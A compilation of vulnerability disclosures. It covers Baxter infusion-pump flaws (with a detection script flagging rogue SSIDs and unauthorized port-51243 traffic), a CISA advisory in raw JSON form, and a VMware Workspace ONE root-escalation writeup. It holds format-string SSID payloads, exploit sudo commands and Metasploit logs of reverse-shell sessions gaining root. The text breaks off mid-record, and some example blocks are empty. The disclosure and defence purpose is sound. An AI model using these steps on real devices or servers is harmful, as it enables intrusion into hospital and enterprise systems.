
Rapid7, Inc. (Rapid7) discovered vulnerabilities in two TCP/IP-enabled medical devices produced by Baxter Healthcare. The affected products are:
* SIGMA Spectrum Infusion Pump (Firmware Version 8.00.01)
* SIGMA Wi-Fi Battery (Firmware Versions 16, 17, 20 D29)
Rapid7 initially reported these issues to Baxter on April 20, 2022. Since then, members of our research team have worked alongside the vendor to discuss the impact, resolution, and a coordinated response for these vulnerabilities.
## Product description
Baxter’s SIGMA Spectrum product is a commonly used brand of infusion pumps, which are typically used by hospitals to deliver medication and nutrition directly into a patient’s circulatory system. These TCP/IP-enabled devices deliver data to healthcare providers to enable more effective, coordinated care.
## Credit
The vulnerabilities in two TCP/IP-enabled medical devices were discovered by Deral Heiland, Principal IoT Researcher at Rapid7. They are being disclosed in accordance with [Rapid7’s vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>) after coordination with the vendor.
## Vendor statement
"In support of our mission to save and sustain lives, Baxter takes product security seriously. We are committed to working with the security researcher community to verify and respond to legitimate vulnerabilities and ask researchers to participate in our responsible reporting process. Software updates to disable Telnet and FTP (CVE-2022-26392) are in process. Software updates to address the format string attack (CVE-2022-26393) are addressed in WBM version 20D30 and all other WBM versions. Authentication is already available in Spectrum IQ (CVE-2022-26394). Instructions to erase all data and settings from WBMs and pumps before decommissioning and transferring to other facilities (CVE-2022-26390) are in process for incorporation into the Spectrum Operator’s Manual and are available in the [Baxter Security Bulletin](<https://www.baxter.com/product-security#additionalresources>)."
## Exploitation and remediation
This section details the potential for exploitation and our remediation guidance for the issues discovered and reported by Rapid7, so that defenders of this technology can gauge the impact of, and mitigations around, these issues appropriately.
## Battery units store Wi-Fi credentials (CVE-2022-26390)
Rapid7 researchers tested Spectrum battery units for vulnerabilities. We found that every unit tested stores Wi-Fi credential data in non-volatile memory on the device.
When a Wi-Fi battery unit is connected to the primary infusion pump and the infusion pump is powered up, the pump will transfer the Wi-Fi credential to the battery unit.
### Exploitation
An attacker with physical access to an infusion pump could install a Wi-Fi battery unit (easily purchased on eBay), and then quickly power-cycle the infusion pump and remove the Wi-Fi battery – allowing them to walk away with critical Wi-Fi data once a unit has been disassembled and reverse-engineered.
Also, since these battery units store Wi-Fi credentials in non-volatile memory, there is a risk that when the devices are de-acquisitioned and no efforts are made to overwrite the stored data, anyone acquiring these devices on the secondary market could gain access to critical Wi-Fi credentials of the organization that de-acquisitioned the devices.
### Remediation
To mitigate this vulnerability, organizations should restrict physical access by any unauthorized personnel to the infusion pumps or associated Wi-Fi battery units.
In addition, before de-acquisitioning the battery units, batteries should be plugged into a unit with invalid or blank Wi-Fi credentials configured and the unit powered up. This will overwrite the Wi-Fi credentials stored in the non-volatile memory of the batteries. Wi-Fi must be enabled on the infusion pump unit for this overwrite to work properly.
## Format string vulnerabilities
### “Hostmessage” (CVE-2022-26392)
When running a telnet session on the Baxter Sigma Wi-Fi Battery Firmware Version 16, the command “hostmessage” contains a format string vulnerability.
### Exploitation
An attacker could trigger this format string vulnerability by entering the following command during a telnet session:

To view the output of this format string vulnerability, _`set trace state=on`_ must be enabled in the telnet session. _`set trace`_ does not need to be enabled for the format string vulnerability to be triggered, but it does need to be enabled if the output of the vulnerability is to be viewed.
Once _`set trace`_ is enabled and showing output within the telnet session screen, the output of the vulnerability can be viewed, as shown below, where each _`%x`_ returned data from the device’s process stack.

### SSID (CVE-2022-26393)
Rapid7 also found another format string vulnerability on Wi-Fi battery software version 20 D29. This vulnerability is triggered within SSID processing by the _`get_wifi_location (20)`_ command being sent via XML to the Wi-Fi battery at TCP port 51243 or UDP port 51243.

### Exploitation
This format string vulnerability can be triggered by first setting up a Wi-Fi access point containing format string specifiers in the SSID. Next, an attacker could send a _`get_wifi_location (20)`_ command via TCP Port 51243 or UDP port 51243 to the infusion pump. This causes the device to process the SSID name of the access point nearby and trigger the exploit. The results of the triggering of format strings can be viewed with trace log output within a telnet session as shown below.

The SSID of _`AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x`_ allows for control of 4 bytes on the stack, as shown above, using the _`%x`_ to walk the stack until it reaches 41414141. By changing the leading _`AAAA`_ in the SSID, a malicious actor could potentially use the format string injection to read and write arbitrary memory. At a minimum, using format strings of _`%s`_ and _`%n`_ could allow for a denial of service (DoS) by triggering an illegal memory read (_`%s`_) and/or illegal memory write (_`%n`_).
Note that in order to trigger this DoS effect, the attacker would need to be within normal radio range and either be on the device's network or wait for an authorized _`get_wifi_location`_ command (the latter would itself be an unusual, non-default event).
### Remediation
To prevent exploitation, organizations should restrict access to the network segments containing the infusion pumps. They should also monitor network traffic for any unauthorized host communicating over TCP and UDP port 51243 to infusion pumps. In addition, be sure to monitor Wi-Fi space for rogue access points containing format string specifiers within the SSID name.
## Unauthenticated network reconfiguration via TCP/UDP (CVE-2022-26394)
All Wi-Fi battery units tested (versions 16, 17, and 20 D29) allowed remote, unauthenticated changing of the SIGMA GW IP address. The SIGMA GW setting configures the back-end communication services for the device's operation.
### Exploitation
An attacker could accomplish a remote redirect of SIGMA GW by sending an XML command 15 to TCP or UDP port 51243. During testing, only the SIGMA GW IP was found to be remotely changeable using this command. An example of this command and associated structure is shown below:

This could be used by a malicious actor to man-in-the-middle (MitM) all the communication initiated by the infusion pump. This could lead to information leakage and/or data being manipulated by a malicious actor.
### Remediation
Organizations using SIGMA Spectrum products should restrict access to the network segments containing the infusion pumps. They should also monitor network traffic for any unauthorized host communicating over TCP and UDP port 51243 to the infusion pumps.
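The remediation guidance for CVE-2022-26393 and CVE-2022-26394 both come down to the same two monitoring tasks: watch for hosts other than the legitimate SIGMA gateway talking to pumps on TCP/UDP 51243, and watch the Wi-Fi space for SSIDs carrying printf-style specifiers. The script below is an added example of that detection logic and is not Rapid7's or Baxter's tooling. The flow-log and Wi-Fi-survey line formats, the pump and gateway addresses, and the allowlist are all constructed for illustration; only port 51243 and the specifier patterns come from the advisory.

```python
"""Detection helpers for the SIGMA Spectrum remediation guidance.

Added example (not Rapid7's or Baxter's code). Log formats, addresses and
the allowlist are constructed; port 51243 comes from the advisory.
"""
import re
from collections import namedtuple

# Port on which the Wi-Fi battery accepts XML commands (from the advisory).
SIGMA_PORT = 51243

# Constructed: the only hosts that legitimately speak to pumps on 51243
# (e.g. the real SIGMA gateway). Anything else is worth an alert.
AUTHORIZED_HOSTS = {"10.20.0.5"}

# Constructed: addresses assigned to the pumps' Wi-Fi battery modules.
PUMP_HOSTS = {"10.20.1.11", "10.20.1.12"}

Flow = namedtuple("Flow", "ts proto src sport dst dport")

# Constructed flow-log sample: "<timestamp> <proto> <src>:<port> > <dst>:<port>"
SAMPLE_FLOWS = """\
2022-09-08T10:00:01Z TCP 10.20.0.5:40001 > 10.20.1.11:51243
2022-09-08T10:00:02Z UDP 10.20.7.99:51243 > 10.20.1.11:51243
2022-09-08T10:00:03Z TCP 10.20.1.11:49152 > 10.20.0.5:443
2022-09-08T10:00:04Z TCP 192.168.44.3:55555 > 10.20.1.12:51243
2022-09-08T10:00:05Z UDP 10.20.0.5:60000 > 10.20.1.12:51243
"""

FLOW_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>TCP|UDP)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+>\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_flow(line):
    """Parse one constructed flow-log line; return None for lines that do not match."""
    m = FLOW_RE.match(line.strip())
    if not m:
        return None
    return Flow(m["ts"], m["proto"], m["src"], int(m["sport"]),
                m["dst"], int(m["dport"]))


def unauthorized_sigma_flows(lines, pumps=PUMP_HOSTS, allowed=AUTHORIZED_HOSTS):
    """Return flows where a non-allowlisted host reaches a pump on port 51243.

    Both TCP and UDP are checked because the advisory names both transports.
    """
    hits = []
    for line in lines:
        f = parse_flow(line)
        if f is None:
            continue
        if f.dst in pumps and f.dport == SIGMA_PORT and f.src not in allowed:
            hits.append(f)
    return hits


# A printf-style conversion: '%', optional flags/width/precision/length, then
# a conversion character. "%%" is a literal percent sign and is stripped first
# so that "50%%off" is not flagged while "AAAA%x" and "free%n" are.
FORMAT_SPEC_RE = re.compile(
    r"%[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|j|z|t|L)?[diouxXeEfFgGaAcspn]"
)


def ssid_has_format_specifiers(ssid):
    """True if the SSID contains at least one printf-style conversion."""
    return bool(FORMAT_SPEC_RE.search(ssid.replace("%%", "")))


# Constructed Wi-Fi survey sample: "<ssid>|<bssid>|<rssi>"
SAMPLE_SCAN = """\
Hospital-Clinical|b8:27:eb:00:00:01|-52
AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x|de:ad:be:ef:00:02|-70
Guest 100%|00:11:22:33:44:55|-80
free_wifi%n%n%n%n|de:ad:be:ef:00:03|-65
"""


def rogue_ssids(lines):
    """Return (ssid, bssid) pairs whose SSID carries a format specifier."""
    found = []
    for line in lines:
        parts = line.strip().split("|")
        if len(parts) != 3:
            continue
        ssid, bssid, _rssi = parts
        if ssid_has_format_specifiers(ssid):
            found.append((ssid, bssid))
    return found


if __name__ == "__main__":
    for f in unauthorized_sigma_flows(SAMPLE_FLOWS.splitlines()):
        print(f"ALERT unauthorized {f.proto} to pump {f.dst}:{f.dport} from {f.src} at {f.ts}")
    for ssid, bssid in rogue_ssids(SAMPLE_SCAN.splitlines()):
        print(f"ALERT suspicious SSID {ssid!r} from BSSID {bssid}")
```

The flow check deliberately keys on the destination port only: in the constructed sample the second line uses 51243 as its source port as well, which is exactly the sort of traffic a source-port filter would miss. The SSID check is conservative on purpose: a trailing bare "%" (as in "Guest 100%") is not a conversion and is not flagged, while any complete specifier, including the _`%s`_ and _`%n`_ cases the advisory calls out, is.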
## UART configuration access to Wi-Fi configuration data (additional finding)
The SIGMA Spectrum infusion pump unit transmits data unencrypted to the Wi-Fi battery unit via universal asynchronous receiver-transmitter (UART). During the power-up cycle of the infusion pump, the first block of data contains the Wi-Fi configuration data. This communication contains the SSID and the 64-character hex PSK.

### Exploitation
A malicious actor with **physical access** to an infusion pump can place a communication shim between the units (i.e., the pump and the Wi-Fi battery) and capture this data during the power-up cycle of the unit.

### Remediation
To help prevent exploitation, organizations should restrict physical access by unauthorized persons to the infusion pumps and associated Wi-Fi battery units.
Note that this is merely an additional finding based on physical, hands-on access to the device. While Baxter has addressed this finding through better decommissioning advice to end users, this particular issue does not rank for its own CVE identifier, as local encryption is beyond the scope of the hardware design of the device.
## Disclosure timeline
Baxter is an exemplary medical technology company with an obvious commitment to patient and hospital safety. While medtech vulnerabilities can be tricky and expensive to work through, we're quite pleased with the responsiveness, transparency, and genuine interest shown by Baxter's product security teams.
* **April, 2022:** Issues discovered by [Deral Heiland](<https://twitter.com/Percent_X>) of Rapid7
* **Wed, April 20, 2022:** Issues reported to [Baxter product security](<https://www.baxter.com/product-security#disclosure>)
* **Wed, May 11, 2022:** Update requested from Baxter
* **Wed, Jun 1, 2022:** Teleconference with Baxter and Rapid7 presenting findings
* **Jun-Jul 2022:** Several follow-up conversations and updates between Baxter and Rapid7
* **Tue, Aug 2, 2022:** Coordination tracking over [VINCE](<https://www.kb.cert.org/vince/>) and more teleconferencing involving Baxter, Rapid7, CERT/CC, and [ICS-CERT](<https://www.cisa.gov/uscert/ics/advisories>) (VU#142423)
* **Wed, Aug 31, 2022:** Final review of findings and mitigations
* **Thu, Sep 8, 2022:** Baxter advisory [published](<https://www.baxter.com/product-security#additionalresources>)
* **Thu, Sep 8, 2022:** Public disclosure of these issues
* **Thu, Sep 8, 2022:** ICS-CERT [advisory published](<https://www.cisa.gov/uscert/ics/advisories/icsma-22-251-01>)
TECHNICAL DETAILS\n\n### 4.1 AFFECTED PRODUCTS\n\nThe following versions of Sigma Spectrum Infusion systems are affected:\n\n * Sigma Spectrum v6.x model 35700BAX\n * Sigma Spectrum v8.x model 35700BAX2\n * Baxter Spectrum IQ (v9.x) model 35700BAX3\n * Sigma Spectrum LVP v6.x Wireless Battery Modules v16, v16D38, v17, v17D19, v20D29 to v20D32, and v22D24 to v22D28\n * Sigma Spectrum LVP v8.x Wireless Battery Modules v17, v17D19, v20D29 to v20D32, and v22D24 to v22D28\n * Baxter Spectrum IQ LVP (v9.x) with Wireless Battery Modules v22D19 to v22D28\n\n### 4.2 VULNERABILITY OVERVIEW\n\n#### 4.2.1 [MISSING ENCRYPTION OF SENSITIVE DATA CWE-311](<https://cwe.mitre.org/data/definitions/311.html>)\n\nThe Baxter Spectrum WBM (v16, v16D38, v17, v17D19, v20D29 to v20D32, and v22D19 to v22D28) stores network credentials and patient health information (PHI) in unencrypted form. PHI is only stored in Spectrum IQ pumps using auto programming. An attacker with physical access to a device without all data and settings erased may be able to extract sensitive information.\n\n[CVE-2022-26390](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26390>) has been assigned to this vulnerability. A CVSS v3 base score of 4.2 has been calculated; the CVSS vector string is ([AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N>)).\n\n#### 4.2.2 [ USE OF EXTERNALLY CONTROLLED FORMAT STRING CWE-134](<https://cwe.mitre.org/data/definitions/134.html>)\n\n**\\--------- Begin Update A part 2 of 3 ---------**\n\nThe Baxter Spectrum WBM (v16, v16D38, v17, v17D19, and v20D29 to v20D32) when in superuser mode is susceptible to format string attacks via application messaging. 
An attacker could use this to read memory in the WBM, potentially accessing sensitive information.\n\n**\\--------- End Update A part 2 of 3 ---------**\n\nThe Baxter Spectrum WBM (v16, v16D38) and Baxter Spectrum WBM (v17, v17D19, v20D29 to v20D32), when in superuser mode, are susceptible to format string attacks via application messaging. An attacker could use this to read memory in the WBM to access sensitive information.\n\n[CVE-2022-26392](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26392>) has been assigned to this vulnerability. A CVSS v3 base score of 3.1 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N>)).\n\n#### 4.2.3 [USE OF EXTERNALLY CONTROLLED FORMAT STRING CWE-134](<https://cwe.mitre.org/data/definitions/134.html>)\n\nThe Baxter Spectrum WBM (v20D29) is susceptible to format string attacks via application messaging. An attacker could use this to read memory in the WBM to access sensitive information or cause a denial-of-service condition on the WBM.\n\n[CVE-2022-26393](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26393>) has been assigned to this vulnerability. A CVSS v3 base score of 5.0 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L>)).\n\n#### 4.2.4 [MISSING AUTHENTICATION FOR CRITICAL FUNCTION CWE-306](<https://cwe.mitre.org/data/definitions/306.html>)\n\n**\\--------- Begin Update A part 3 of 3 ---------**\n\nThe Baxter Spectrum WBM (v16, v16D38, v17, v17D19, and v20D29 to v20D32) does not perform mutual authentication with the gateway server host. This could allow an attacker to perform a machine-in-the-middle attack that modifies parameters, making the network connection fail. 
Alternatively, an attacker could spoof the server host and send specifically crafted data.\n\n[CVE-2022-26394](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26394>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:L>)).\n\n**\\--------- End Update A part 3 of 3 ---------**\n\n### 4.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Healthcare and Public Health\n * **COUNTRIES/AREAS DEPLOYED:** United States, Canada, Puerto Rico, Caribbean\n * **COMPANY HEADQUARTERS LOCATION:** United States\n\n### 4.4 RESEARCHER\n\nDeral Heiland, Principal IoT Researcher at Rapid7, reported these vulnerabilities to Baxter.\n\n## 5\\. MITIGATIONS\n\nAccording to Baxter, software updates to disable Telnet and FTP (CVE-2022-26392) are in process. Software updates addressing the format string attack (CVE-2022-26393) are included in WBM version 20D30 and all other WBM versions. Authentication is already available in Spectrum IQ (CVE-2022-26394).\n\nInstructions to erase all data and settings on WBMs and pumps before decommissioning and transferring to other facilities (CVE-2022-26390) are in process for incorporation into the Spectrum Operator\u2019s Manual.\n\nBaxter provides recommended steps for erasing all data and settings on the pump to be decommissioned:\n\n * Reset the network settings (Biomed->Network Configuration->Transfer Network Settings->Reset).\n * Delete the drug library.\n * Clear the history log.\n\nTo erase all data and settings on the WBM to be decommissioned:\n\n * Select a pump other than the one last used with the WBM.\n * Reset the network settings and enable networking on the pump.\n * Place the WBM on the pump.\n * Wait until the network icon turns yellow.\n\nIn conjunction with the user\u2019s own network security policies, Baxter recommends the following 
mitigations to reduce the likelihood these vulnerabilities will be exploited:\n\n * Ensure appropriate physical controls within user environments to protect against unauthorized access to devices.\n * Isolate the Spectrum Infusion System on its own virtual local area network (VLAN) to segregate the system from other hospital systems and reduce the probability that a threat actor could execute an adjacent attack, such as a machine-in-the-middle attack against the system to observe clear-text communications.\n * Use the strongest available wireless network security protocols (WPA2, EAP-TLS, etc.) to provide authentication/encryption of wireless data sent to/from the Spectrum Infusion System.\n * Users should ensure the WBM is rebooted after configuration for their network(s) by removing the WBM from the rear of the Spectrum device for 10-15 seconds, and then re-attaching the WBM.\n * Users should always monitor for and/or block unexpected traffic, such as FTP and Telnet, at network boundaries into the Spectrum-specific VLAN.\n\nAs a last resort, users may disable wireless operation of the pump; the Spectrum Infusion System was designed to operate without network access. This action would impact an organization\u2019s ability to rapidly deploy drug library (formulary) updates to their pumps.\n\nFor additional information, see the [Baxter Product Security Bulletin](<https://www.baxter.com/product-security#additionalresources>).\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. 
Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure they are [not accessible from the Internet](<https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-10-301-01>).\n * Locate control system networks and remote devices behind firewalls and isolate them from business networks.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as its connected devices.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nCISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/Recommended-Practices>) on the ICS webpage at [cisa.gov/ics](<https://cisa.gov/ics>). Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with [Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS webpage at [cisa.gov/ics](<https://cisa.gov/ics>) in the technical information paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.cisa.gov/uscert/ics/tips/ICS-TIP-12-146-01B>).\n\nOrganizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities. 
These vulnerabilities have a high attack complexity.\n\n### Vendor\n\nBaxter\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-09-29T12:00:00", "type": "ics", "title": "Baxter Sigma Spectrum Infusion Pump (Update A)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26390", "CVE-2022-26392", "CVE-2022-26393", "CVE-2022-26394"], "modified": "2022-09-29T12:00:00", "id": "ICSMA-22-251-01", "href": "https://www.cisa.gov/news-events/ics-medical-advisories/icsma-22-251-01", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:P"}}], "rapid7blog": [{"lastseen": "2022-08-05T16:02:09", "description": "\n\nThe VMware Workspace ONE Access, Identity Manager, and vRealize Automation products contain a locally exploitable vulnerability whereby the under-privileged `horizon` user can escalate their permissions to those of the `root` user. Notably, the `horizon` user runs the externally accessible web application. This means that remote code execution (RCE) within that component could be chained with this vulnerability to obtain remote code execution as the root user. 
At the time of this writing, [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>) is one such RCE vulnerability (that notably has a corresponding [Metasploit module here](<https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb>)) that can be easily chained with one or both of the issues described herein.\n\n## Product description\n\n[VMware Workspace ONE Access](<https://www.vmware.com/products/workspace-one/access.html>) is a platform that lets organizations give their employees fast and easy access to the applications they need. VMware Workspace ONE Access was formerly known as VMware Identity Manager.\n\n## Impact\n\nThese vulnerabilities are local privilege escalation flaws, and by themselves, present little risk in an otherwise secure environment. In both cases, the local user must be `horizon` for successful exploitation.\n\nThat said, it\u2019s important to note that the `horizon` user runs the externally accessible web application, which has seen several recent vulnerabilities \u2014 namely [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>), which, when exploited, allows for remote code execution as the `horizon` user. Thus, chaining an exploit for CVE-2022-22954 with either of these vulnerabilities can allow a remote attacker to go from no access to root access in two steps.\n\n## Credit\n\nThese issues were disclosed by VMware on Tuesday, August 2, 2022 within the [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) bulletin. In June, Spencer McIntyre of Rapid7 discovered these issues while researching an unrelated vulnerability. 
They were disclosed in accordance with [Rapid7\u2019s vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>).\n\n## CVE-2022-31660\n\nCVE-2022-31660 arises from the fact that the permissions on the file `/opt/vmware/certproxy/bin/cert-proxy.sh` are such that the `horizon` user is both the owner and has access to invoke this file.\n\nTo demonstrate and exploit this vulnerability, that file is overwritten, and then the following command is executed as the `horizon` user:\n \n \n sudo /usr/local/horizon/scripts/certproxyService.sh restart\n \n\nNote that, depending on the patch level of the system, the certproxyService.sh script may be located at an alternative path and require a slightly different command:\n \n \n sudo /opt/vmware/certproxy/bin/certproxyService.sh restart\n \n\nIn both cases, the horizon user is able to invoke the `certproxyService.sh` script from sudo without a password. This can be verified by executing `sudo -n --list`. The `certproxyService.sh` script invokes the `systemctl` command to restart the service based on its configuration file. The service configuration file, located at `/run/systemd/generator.late/vmware-certproxy.service`, dispatches to `/etc/rc.d/init.d/vmware-certproxy` through the `ExecStart` and `ExecStop` directives, which in turn executes `/opt/vmware/certproxy/bin/cert-proxy.sh`.\n\n### Proof of concept\n\nTo demonstrate this vulnerability, a Metasploit module was written and submitted on GitHub in [PR #16854](<https://github.com/rapid7/metasploit-framework/pull/16854>).\n\nWith an existing Meterpreter session, no options other than the SESSION need to be specified. Everything else will be automatically determined at runtime. 
In this scenario, the original Meterpreter session was obtained with the [module for CVE-2022-22954](<https://github.com/rapid7/metasploit-framework/blob/6532365dc84c2052018456434363e4bfeca85ad4/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb>), released earlier this year.\n \n \n [*] Sending stage (40132 bytes) to 192.168.159.98\n [*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.98:42312) at 2022-08-02 16:26:16 -0400\n \n meterpreter > sysinfo\n Computer : photon-machine\n OS : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021\n Architecture : x64\n System Language : en_US\n Meterpreter : python/linux\n meterpreter > getuid\n Server username: horizon\n meterpreter > background \n [*] Backgrounding session 1...\n msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe \n [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp\n msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > set SESSION -1\n SESSION => -1\n msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > run\n \n [*] Started reverse TCP handler on 192.168.250.134:4444 \n [*] Backing up the original file...\n [*] Writing '/opt/vmware/certproxy/bin/cert-proxy.sh' (601 bytes) ...\n [*] Triggering the payload...\n [*] Sending stage (40132 bytes) to 192.168.250.237\n [*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:63493) at 2022-08-02 16:26:57 -0400\n [*] Restoring file contents...\n [*] Restoring file permissions...\n \n meterpreter > getuid\n Server username: root\n meterpreter >\n \n\n## CVE-2022-31661\n\nCVE-2022-31661 arises from the fact that the `/usr/local/horizon/scripts/getProtectedLogFiles.hzn` script can be run with root privileges without a password using the sudo command. 
This script in turn will recursively change the ownership of a user-supplied directory to the `horizon` user, effectively granting them write permissions to all contents.\n\nTo demonstrate and exploit this vulnerability, we can execute the following command as the `horizon` user:\n \n \n sudo /usr/local/horizon/scripts/getProtectedLogFiles.hzn exportProtectedLogs /usr/local/horizon/scripts/\n \n\nAt this point, the horizon user has write access (through ownership) to a variety of scripts that also have the right to invoke using sudo without a password. These scripts can be verified by executing `sudo -n --list`. A careful attacker would have backed up the ownership information for each file in the directory they intend to target and restored them once they had obtained root-level permissions.\n\nThe root cause of this vulnerability is that the `exportProtectedLogs` subcommand invokes the `getProtectedLogs` function that will change the ownership information to the `TOMCAT_USER`, which happens to be `horizon`.\n\nExcerpt from `getProtectedLogFiles.hzn`:\n \n \n function getProtectedLogs()\n {\n chown ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION\n rm -f $TARGET_DIR_LOCATION/messages*\n rm -f $TARGET_DIR_LOCATION/boot*\n rm -rf $TARGET_DIR_LOCATION/journal*\n \n cp $VAR_LOG_MESSAGES* $TARGET_DIR_LOCATION\n cp $BOOT_LOG_MESSAGES* $TARGET_DIR_LOCATION\n chown -R ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION/\n \n }\n \n\n## Remediation\n\nUsers should apply patches released in [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) to remediate these vulnerabilities. If they are unable to, users should segment the appliance from remote access, especially if known issues in the web front end like CVE-2022-22954 also remain unpatched.\n\nNote that fixing these vulnerabilities helps shore up internal, local defenses against attacks targeting external interfaces. 
For practical purposes, these are merely internal, local privilege escalation issues, so enterprises running VMware Workspace ONE Access installations with current patch levels should schedule updates addressing them as part of routine patch cycles.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to vulnerabilities described in [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) with authenticated, version-based coverage released on August 4, 2022 (ContentOnly-content-1.1.2606-202208041718).\n\n## Disclosure timeline\n\n * **May 20, 2022** \\- Issue discovered by Spencer McIntyre of Rapid7\n * **June 28, 2022** \\- Rapid7 discloses the vulnerability to VMware\n * **June 29, 2022** \\- VMware acknowledges receiving the details and begins an investigation\n * **June 30, 2022** \\- VMware confirms that they have reproduced the issues, requests that Rapid7 not involve CERT for simplicity\u2019s sake\n * **July 1, 2022** \\- Rapid7 replies, agreeing to leave CERT out\n * **July 22, 2022** \\- VMware states they will publish an advisory once the issues have been fixed, asks whom to credit\n * **July 22, 2022** \\- Rapid7 responds confirming credit, inquires about a target date for a fix\n * **August 2, 2022** \\- VMware discloses these vulnerabilities as part of VMSA-2022-0021 (without alerting Rapid7 of pending disclosure)\n * **August 2, 2022** \\- Metasploit module submitted on GitHub in [PR #16854](<https://github.com/rapid7/metasploit-framework/pull/16854>)\n * **August 5, 2022** \\- This disclosure blog", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 
